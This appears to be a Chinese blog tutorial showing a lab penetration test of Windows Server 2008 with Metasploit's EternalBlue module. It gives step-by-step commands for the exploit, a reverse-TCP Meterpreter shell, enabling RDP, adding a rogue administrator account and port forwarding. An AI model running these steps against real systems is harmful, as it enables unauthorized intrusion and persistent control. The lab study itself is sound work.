天天看點

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

這次我們利用的是ms17-10對2008伺服器進行一次滲透測試。

話不多說QAQ

測試環境:

攻擊機:Kali (2018,2)  

 IP:192.168.10.78

靶機:windows server 2008 (SP1)  

IP:192.168.10.77

因為我的kali是2018年的,已經附帶了ms17_010,有些小夥伴的kali還是2016的版本,我這裡也貼出來了下載下傳子產品和安裝教程。

這裡借鑒百度的介紹wine:

Wine (“Wine Is Not an Emulator” 的遞歸縮寫)是一個能夠在多種 POSIX-compliant 作業系統(諸如 Linux,Mac OSX 及 BSD 等)上運作 Windows 應用的相容層。

指令:apt-get install wine

預設回車或Y進行安裝。

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

安裝完成後,使用wine 測試一下是否能使用cmd.exe

Metasploit利用ms17_010滲透測試winserv 2008 SP 2
Metasploit利用ms17_010滲透測試winserv 2008 SP 2

exit退出

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

将腳本拷貝到 /usr/share/metasploit-framework/modules/exploit/windows/smb

cd Eternalblue-Doublepulsar-Metasploit

cp -r dips/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

ls檢視一下是否存在,這裡就不上圖了因為我已經安裝好了。嘿嘿orz

--假--裝--分--界--線----------

以上就是安裝ms17-010的操作了

然後使用nmap測試我們靶機開放了什麼端口

nmap -O -sV 192.168.10.77

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

這時候我們的靶機是沒有開啟3389的

繼續我們下面的操作

啟動一下postgresql 

service postgresql start

然後進入msfconsole

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

然後search 快速搜尋一下ms17-010

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

use exploit/windows/smb/ms17_010-eternalblue    調用子產品

show options 檢視需要設定的

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

set RHOST 192.168.10.77   設定目标IP位址

set payload windows/x64/meterpreter/reverse_tcp。 選擇payload

show  options。檢視設定

set LHOST 192.168.10.78。 設定本機位址

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

設定payload以後檢視一下設定,是不是漏下了什麼,一般再設定payload都需要set 本機位址

然後exploit進行攻擊,試一下。

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

問題不大,小場面穩得住,我們成功滲透進去了2008的測試靶機

然後我們可以開啟3389啊,什麼的騷操作等

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

run getgui -e 是真的好用

雖然回報資訊系那時 RDP is disables 但是3389已經開啟,來用nmap進行掃描看一下

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

然後我們還是用 run getgui -u xxx -p xxxx 來建立使用者和密碼,為我們3389進入桌面做好鋪墊

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

哦不!!! could not be created 這個是不能建立。orz

失敗了, 這樣我們就隻能進shell ,然後建立使用者,并進行提權了。

從meterpreter>進入shell

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

然後使用windos cmd指令進行建立使用者并加入管理者組

net user admin 1q! /add。 因為2008系統原因密碼必須要要有數字、字母、符合,我就說前面怎麼測試失敗,

net local group Administrators admin /add  把admin使用者加入本地管理者組

試一下orz

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

然後我們就可以使用遠端桌面進行連接配接

使用rdesktop + ip 

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

這裡使用前面咱們設定好的使用者名和密碼,進行登入

Metasploit利用ms17_010滲透測試winserv 2008 SP 2

ok 這裡我們成功進入了目标靶機,完成了這次的滲透測試,在前面我進行測試的時候因為目标靶機開啟防火牆,導緻我們3389連接配接不上,我們可以使用端口轉發,把目标3389轉到本地某個端口上

指令如下

meterpreter>portfwd add -l 你本機的監聽端口 -r 127.0.0.1 -p 3389

然後我們就可以用windows下的遠端桌面連接配接連接配接kali ip位址,進行桌面連接配接。

Metepreter與專業的遠端控制軟體不同。Metepreter更适合作為在擷取最終權限之前當做臨時的橋梁,而像灰鴿子這樣的軟體則更适合做為在擷取權限之後的長期監控中使用。

這就是利用ms17-010進行的内網滲透、提權、開啟遠端桌面,達到我們想要的操作。

看到這裡大家也對meterpreter有了一點了解。

謝謝大家的觀看,希望大佬也能指出我的問題所在,讓我們有進步的空間。

有喜歡滲透測試的小夥伴可以加我QQ:MTYyNzIzODc3NA

互相學習,共同進步。

繼續閱讀